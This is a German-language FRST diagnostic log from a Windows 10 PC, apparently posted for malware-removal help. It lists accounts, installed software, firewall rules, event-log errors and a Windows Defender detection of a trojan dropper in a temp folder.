2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive
2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder
2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-10 09:12 - 2019-09-16 11:29 - 000000000 ___RD C:\Users\buskr5\Desktop\Schulkinder

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         

Addition Log:

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-01-2021
durchgeführt von ***** (09-01-2021 15:09:43)
Gestartet von C:\Users\*****\Downloads
Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)
buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Limited - Enabled) => C:\Users\buskr5
DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)
Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)
***** (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\*****
WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Ahnenblatt 3.02 (HKLM-x32\...\Ahnenblatt 3_is1) (Version: 3.2.1.1 - Dirk Böttcher)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)
Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)
DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)
Eumex 800 V1.30 (HKLM-x32\...\{FACE9D51-E374-4DDB-857C-816FCB1D6B40}) (Version: 1.30.0000 - T-Home) Hidden
Eumex 800 V1.30 (HKLM-x32\...\InstallShield_{FACE9D51-E374-4DDB-857C-816FCB1D6B40}) (Version: 1.30.0000 - T-Home)
Eumex RNDIS64 Treiber V1.02 (HKLM\...\{293C4FDD-FB80-48F8-8B40-F085392FDAA1}) (Version: 1.02.0000 - Deutsche Telekom)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)
HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)
HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)
HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)
iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)
KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden
MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)
Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)
Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )
Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden
Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)
Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden
Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
Windows-Treiberpaket - T-Home Net  (06/30/2010 6.0.6000.16384) (HKLM\...\7B73EBFEF26F2C40D3AA9D389F5CF2C77121106C) (Version: 06/30/2010 6.0.6000.16384 - T-Home)

Packages:
=========
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe [2020-07-16] (Microsoft Corporation) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2013-07-01 00:17 - 2013-07-01 00:17 - 000017920 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libdtp.dll
2013-07-01 00:15 - 2013-07-01 00:15 - 000022016 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libidb.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000628224 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libike.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000116736 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libip.dll
2013-07-01 00:15 - 2013-07-01 00:15 - 000018432 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libith.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000013312 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\liblog.dll
2013-07-01 00:17 - 2013-07-01 00:17 - 000029184 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libpfk.dll
2013-07-01 00:17 - 2013-07-01 00:17 - 000035840 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvflt.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000039936 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvnet.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

Network Binding:
=============
Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 
WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{166A50AB-BA35-4DC0-94F9-86E3C7612B7F}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{E39623A3-4694-43EA-861D-846DE1BBE081}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{41F20948-57E6-48C0-B787-8E350E0F4AE3}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{9EC5C841-0316-4C4C-8AC6-5D47D1515E43}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2C47819B-0C76-41E7-8951-FF9884032B29}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{A528EDB2-5B14-4C19-840E-E50161882359}] => (Allow) LPort=5357
FirewallRules: [{35A9C84E-C44A-4EB6-A179-101E53499E5B}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{DF2A37A0-22B5-4F56-BEF2-D55F24A9E8A6}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{6C39964B-8607-462D-BADE-7B852BCE9A96}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{DEC7E16E-33C1-4DE9-A3C5-D9205AEE5645}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{24C9FA9C-13A2-43E7-A79D-703A70335C05}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{65C8E351-555D-4A86-9AB3-CD29636B7DA9}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{E69D8B9E-7CEB-410C-8145-C81E4CCB8E77}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{BC66B58C-B648-4497-889E-7FB43E3E140B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9CF1E217-96B2-4C50-B89D-32E490BC3A5D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C0B9ABF0-C6CA-44B7-9DF8-6AE21BACF8B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EBD4A9EA-A5CF-42F3-999B-FC71F044B516}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{6A280486-017D-4867-948B-EF1175A2B9A1}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei
FirewallRules: [UDP Query User{3098913F-3817-46A9-B646-AEE9F468614B}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei
FirewallRules: [{24B5A986-5521-4ED0-9467-91D2225031A8}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{7510E694-223F-4E51-80DD-869688F9BE1F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{5EDC0426-307F-4140-BC21-6F42F1A6D414}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{ACF9D1E2-41C9-4BCA-BFDE-C58E7AEB1799}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{9C443C88-A482-48E0-A390-269EC8292DA5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{C2472821-64AA-418D-B658-F3DC8B7D5DC9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Wiederherstellungspunkte =========================

21-12-2020 07:06:20 Geplanter Prüfpunkt
28-12-2020 10:50:36 Geplanter Prüfpunkt
06-01-2021 10:37:08 Geplanter Prüfpunkt

==================== Fehlerhafte Geräte im Gerätemanager ============

Name: Shrew Soft Virtual Adapter
Description: Shrew Soft Virtual Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Shrew Soft
Service: vnet
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc0000005
Fehleroffset: 0x03233f2e
ID des fehlerhaften Prozesses: 0x285c
Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 4c0

Startzeit: 01d6df75472ad580

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Unknown

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 838

Startzeit: 01d6df7570957287

Beendigungszeit: 24

Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2ddc

Startzeit: 01d6d2c180af7335

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe

Relative Anwendungs-ID des fehlerhaften Pakets: App

Absturztyp: Cross-process

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 28f4

Startzeit: 01d6d2c07cb57be1

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process

Error: (12/15/2020 09:58:42 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2608

Startzeit: 01d6d2b1bd864c9b

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: b520483e-c602-45e2-8fe9-15a88b5d0f17

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Unknown

Error: (12/10/2020 08:09:56 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


Systemfehler:
=============
Error: (01/09/2021 03:07:09 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:07:09 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXjytc7c0yvwb8n3cw0r82k4364sd1s7bv.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca

Error: (01/09/2021 03:07:09 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


Windows Defender:
===================================
Date: 2021-01-09 15:00:56.0110000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-07 19:07:31.1610000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {F826CD36-B17A-4994-843F-547ED9BF91B1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Vollständige Überprüfung
Benutzer: PC5-L\buskr5

Date: 2021-01-07 19:00:40.2340000Z
Description: 
